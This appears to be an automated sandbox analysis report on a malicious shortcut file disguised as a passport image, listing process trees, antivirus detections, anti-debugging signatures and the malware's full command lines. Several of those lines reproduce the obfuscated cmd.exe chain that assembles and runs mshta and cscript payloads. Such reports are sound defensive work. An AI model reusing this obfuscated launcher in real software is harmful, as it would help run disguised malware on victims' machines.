Category | Machine | Started | Completed |
---|---|---|---|
FILE | s1_win7_x6402 | July 13, 2021, 6 p.m. | July 13, 2021, 6:03 p.m. |
-
cmd.exe "C:\Windows\System32\cmd.exe" /c start /wait "xXqvbTYfJzOcV" C:\Users\test22\AppData\Local\Temp\DoublesidePassport.jpg.lnk
2444-
cmd.exe "C:\Windows\System32\cmd.exe" /c chgport & echo hello & set Oa=C:\Users\test22\AppData\Local\Temp\test.c& cmd /c " set Ux=%cd%& echo dEL "%0" ^& mS> "%Oa%mD"& set jeC=vE /y & set tEX=C:\Users\test22\AppData\Local\Temp\temp*& echo stop & set /p Yf= <"%Oa%md"&netstat -x & echo | set /p l="%Yf%hTa "%2.%1""> "%Oa%Md"& set eym=mO& echo continue & C:\Windows\system32\cmd.exe /C "(if not exist "Doub*.*k " (for /d %j in ("%tEX%") do echo break ^& for %h in ("%j\Doub*.*k") do cd "%j") else (hostname)) ^& chcp /? ^& cmd /c " echo do exit ^& %eym%%jeC% "Doub*.*k " "C:\Users\test22\img.dat" ^& echo test5 ^& cd %Ux% ^& %Oa%mD dat C:\Users\test22\img ^&"""
2584-
cmd.exe cmd /c " set Ux=C:\Users\test22\AppData\Local\Temp& echo dEL "%0" ^& mS> "%Oa%mD"& set jeC=vE /y & set tEX=C:\Users\test22\AppData\Local\Temp\temp*& echo stop & set /p Yf= <"%Oa%md"&netstat -x & echo | set /p l="%Yf%hTa "%2.%1""> "%Oa%Md"& set eym=mO& echo continue & C:\Windows\system32\cmd.exe /C "(if not exist "Doub*.*k " (for /d %j in ("%tEX%") do echo break & for %h in ("%j\Doub*.*k") do cd "%j") else (hostname)) & chcp /? & cmd /c " echo do exit ^& %eym%%jeC% "Doub*.*k " "C:\Users\test22\img.dat" ^& echo test5 ^& cd %Ux% ^& %Oa%mD dat C:\Users\test22\img ^&"""
2668-
NETSTAT.EXE netstat -x
2732 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo "
2776 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" set /p l="%Yf%hTa "%2.%1"" 1>"C:\Users\test22\AppData\Local\Temp\test.cMd""
2812 -
cmd.exe C:\Windows\system32\cmd.exe /C "(if not exist "Doub*.*k " (for /d %j in ("%tEX%") do echo break & for %h in ("%j\Doub*.*k") do cd "%j") else (hostname)) & chcp /? & cmd /c " echo do exit & %eym%%jeC% "Doub*.*k " "C:\Users\test22\img.dat" & echo test5 & cd %Ux% & C:\Users\test22\AppData\Local\Temp\test.cmD dat C:\Users\test22\img &""
2864-
HOSTNAME.EXE hostname
2908 -
chcp.com chcp /?
2956 -
cmd.exe cmd /c " echo do exit & mOvE /y "Doub*.*k " "C:\Users\test22\img.dat" & echo test5 & cd C:\Users\test22\AppData\Local\Temp & C:\Users\test22\AppData\Local\Temp\test.cmD dat C:\Users\test22\img &"
3000-
-
cscript.exe "C:\Windows\System32\cscript.exe" "/E:jScript" "C:\Users\test22\AppData\Local\Temp\aria-debug-5070.log"
2052-
cscript.exe "C:\Windows\System32\cscript.exe" "//E:JScript" "C:\Users\test22\AppData\Roaming\Microsoft\VsGraphics\VisualStudio Graphics\Pictures\wctNVCHIP.tmp"
2612
Name | Response | Post-Analysis Lookup |
---|---|---|
No hosts contacted. | | |
IP Address | Status | Action |
---|---|---|
No hosts contacted. | | |
Suricata Alerts
No Suricata Alerts
Suricata TLS
No Suricata TLS
file | C:\Users\test22\AppData\Roaming\Microsoft\VsGraphics\VisualStudio Graphics\TextTransforms.exe |
file | C:\Users\test22\AppData\Local\Temp\test.cmD |
file | C:\Users\test22\AppData\Local\Temp\DoublesidePassport.jpg.lnk |
cmdline | cmd /c " set Ux=C:\Users\test22\AppData\Local\Temp& echo dEL "%0" ^& mS> "%Oa%mD"& set jeC=vE /y & set tEX=C:\Users\test22\AppData\Local\Temp\temp*& echo stop & set /p Yf= <"%Oa%md"&netstat -x & echo | set /p l="%Yf%hTa "%2.%1""> "%Oa%Md"& set eym=mO& echo continue & C:\Windows\system32\cmd.exe /C "(if not exist "Doub*.*k " (for /d %j in ("%tEX%") do echo break & for %h in ("%j\Doub*.*k") do cd "%j") else (hostname)) & chcp /? & cmd /c " echo do exit ^& %eym%%jeC% "Doub*.*k " "C:\Users\test22\img.dat" ^& echo test5 ^& cd %Ux% ^& %Oa%mD dat C:\Users\test22\img ^&""" |
cmdline | "C:\Windows\System32\cmd.exe" /c chgport & echo hello & set Oa=C:\Users\test22\AppData\Local\Temp\test.c& cmd /c " set Ux=%cd%& echo dEL "%0" ^& mS> "%Oa%mD"& set jeC=vE /y & set tEX=C:\Users\test22\AppData\Local\Temp\temp*& echo stop & set /p Yf= <"%Oa%md"&netstat -x & echo | set /p l="%Yf%hTa "%2.%1""> "%Oa%Md"& set eym=mO& echo continue & C:\Windows\system32\cmd.exe /C "(if not exist "Doub*.*k " (for /d %j in ("%tEX%") do echo break ^& for %h in ("%j\Doub*.*k") do cd "%j") else (hostname)) ^& chcp /? ^& cmd /c " echo do exit ^& %eym%%jeC% "Doub*.*k " "C:\Users\test22\img.dat" ^& echo test5 ^& cd %Ux% ^& %Oa%mD dat C:\Users\test22\img ^&""" |
cmdline | mShTa "C:\Users\test22\img.dat" |
cmdline | C:\Windows\system32\cmd.exe /C "(if not exist "Doub*.*k " (for /d %j in ("%tEX%") do echo break & for %h in ("%j\Doub*.*k") do cd "%j") else (hostname)) & chcp /? & cmd /c " echo do exit & %eym%%jeC% "Doub*.*k " "C:\Users\test22\img.dat" & echo test5 & cd %Ux% & C:\Users\test22\AppData\Local\Temp\test.cmD dat C:\Users\test22\img &"" |
cmdline | C:\Windows\system32\cmd.exe /S /D /c" echo " |
cmdline | C:\Windows\system32\cmd.exe /S /D /c" set /p l="%Yf%hTa "%2.%1"" 1>"C:\Users\test22\AppData\Local\Temp\test.cMd"" |
file | C:\Users\test22\AppData\Roaming\Microsoft\VsGraphics\VisualStudio Graphics\TextTransforms.exe |
wmi | SELECT UUID FROM Win32_ComputerSystemProduct |
wmi | SELECT Version FROM Win32_OperatingSystem |
description | (no description) | rule | DebuggerCheck__GlobalFlags |
description | (no description) | rule | DebuggerCheck__QueryInfo |
description | (no description) | rule | DebuggerHiding__Thread |
description | (no description) | rule | DebuggerHiding__Active |
description | (no description) | rule | DebuggerException__SetConsoleCtrl |
description | (no description) | rule | ThreadControl__Context |
description | (no description) | rule | SEH__vectored |
description | Checks if being debugged | rule | anti_dbg |
description | Bypass DEP | rule | disable_dep |
cmdline | cmd /c " echo do exit & mOvE /y "Doub*.*k " "C:\Users\test22\img.dat" & echo test5 & cd C:\Users\test22\AppData\Local\Temp & C:\Users\test22\AppData\Local\Temp\test.cmD dat C:\Users\test22\img &" |
cmdline | cmd /c " set Ux=C:\Users\test22\AppData\Local\Temp& echo dEL "%0" ^& mS> "%Oa%mD"& set jeC=vE /y & set tEX=C:\Users\test22\AppData\Local\Temp\temp*& echo stop & set /p Yf= <"%Oa%md"&netstat -x & echo | set /p l="%Yf%hTa "%2.%1""> "%Oa%Md"& set eym=mO& echo continue & C:\Windows\system32\cmd.exe /C "(if not exist "Doub*.*k " (for /d %j in ("%tEX%") do echo break & for %h in ("%j\Doub*.*k") do cd "%j") else (hostname)) & chcp /? & cmd /c " echo do exit ^& %eym%%jeC% "Doub*.*k " "C:\Users\test22\img.dat" ^& echo test5 ^& cd %Ux% ^& %Oa%mD dat C:\Users\test22\img ^&""" |
cmdline | "C:\Windows\System32\cmd.exe" /c chgport & echo hello & set Oa=C:\Users\test22\AppData\Local\Temp\test.c& cmd /c " set Ux=%cd%& echo dEL "%0" ^& mS> "%Oa%mD"& set jeC=vE /y & set tEX=C:\Users\test22\AppData\Local\Temp\temp*& echo stop & set /p Yf= <"%Oa%md"&netstat -x & echo | set /p l="%Yf%hTa "%2.%1""> "%Oa%Md"& set eym=mO& echo continue & C:\Windows\system32\cmd.exe /C "(if not exist "Doub*.*k " (for /d %j in ("%tEX%") do echo break ^& for %h in ("%j\Doub*.*k") do cd "%j") else (hostname)) ^& chcp /? ^& cmd /c " echo do exit ^& %eym%%jeC% "Doub*.*k " "C:\Users\test22\img.dat" ^& echo test5 ^& cd %Ux% ^& %Oa%mD dat C:\Users\test22\img ^&""" |
cmdline | netstat -x |
cmdline | C:\Windows\system32\cmd.exe /C "(if not exist "Doub*.*k " (for /d %j in ("%tEX%") do echo break & for %h in ("%j\Doub*.*k") do cd "%j") else (hostname)) & chcp /? & cmd /c " echo do exit & %eym%%jeC% "Doub*.*k " "C:\Users\test22\img.dat" & echo test5 & cd %Ux% & C:\Users\test22\AppData\Local\Temp\test.cmD dat C:\Users\test22\img &"" |
cmdline | chcp /? |
wmi | SELECT UUID FROM Win32_ComputerSystemProduct |
FireEye | Heur.BZC.YAX.Pantera.10.174A1AAB |
ALYac | Heur.BZC.YAX.Pantera.10.174A1AAB |
Kaspersky | HEUR:Trojan.WinLNK.Agent.gen |
BitDefender | Heur.BZC.YAX.Pantera.10.174A1AAB |
MicroWorld-eScan | Heur.BZC.YAX.Pantera.10.174A1AAB |
Ad-Aware | Heur.BZC.YAX.Pantera.10.174A1AAB |
Emsisoft | Heur.BZC.YAX.Pantera.10.174A1AAB (B) |
SentinelOne | Static AI - Suspicious LNK |
GData | Heur.BZC.YAX.Pantera.10.174A1AAB |
MAX | malware (ai score=82) |
Arcabit | Heur.BZC.YAX.Pantera.10.174A1AAB |
Microsoft | Trojan:Script/Wacatac.B!ml |
VBA32 | Trojan.Link.Crafted |
Panda | JS/BondatN.gen |
parent_process | cscript.exe | martian_process | DoublesidePassport.jpg | ||||||
parent_process | cscript.exe | martian_process | Cscript "//E:JScript" "C:\Users\test22\AppData\Roaming\Microsoft\VsGraphics\VisualStudio Graphics\Pictures\wctNVCHIP.tmp" | ||||||
parent_process | cscript.exe | martian_process | "C:\Windows\System32\cscript.exe" "//E:JScript" "C:\Users\test22\AppData\Roaming\Microsoft\VsGraphics\VisualStudio Graphics\Pictures\wctNVCHIP.tmp" |
cmdline | cmd /c " set Ux=C:\Users\test22\AppData\Local\Temp& echo dEL "%0" ^& mS> "%Oa%mD"& set jeC=vE /y & set tEX=C:\Users\test22\AppData\Local\Temp\temp*& echo stop & set /p Yf= <"%Oa%md"&netstat -x & echo | set /p l="%Yf%hTa "%2.%1""> "%Oa%Md"& set eym=mO& echo continue & C:\Windows\system32\cmd.exe /C "(if not exist "Doub*.*k " (for /d %j in ("%tEX%") do echo break & for %h in ("%j\Doub*.*k") do cd "%j") else (hostname)) & chcp /? & cmd /c " echo do exit ^& %eym%%jeC% "Doub*.*k " "C:\Users\test22\img.dat" ^& echo test5 ^& cd %Ux% ^& %Oa%mD dat C:\Users\test22\img ^&""" |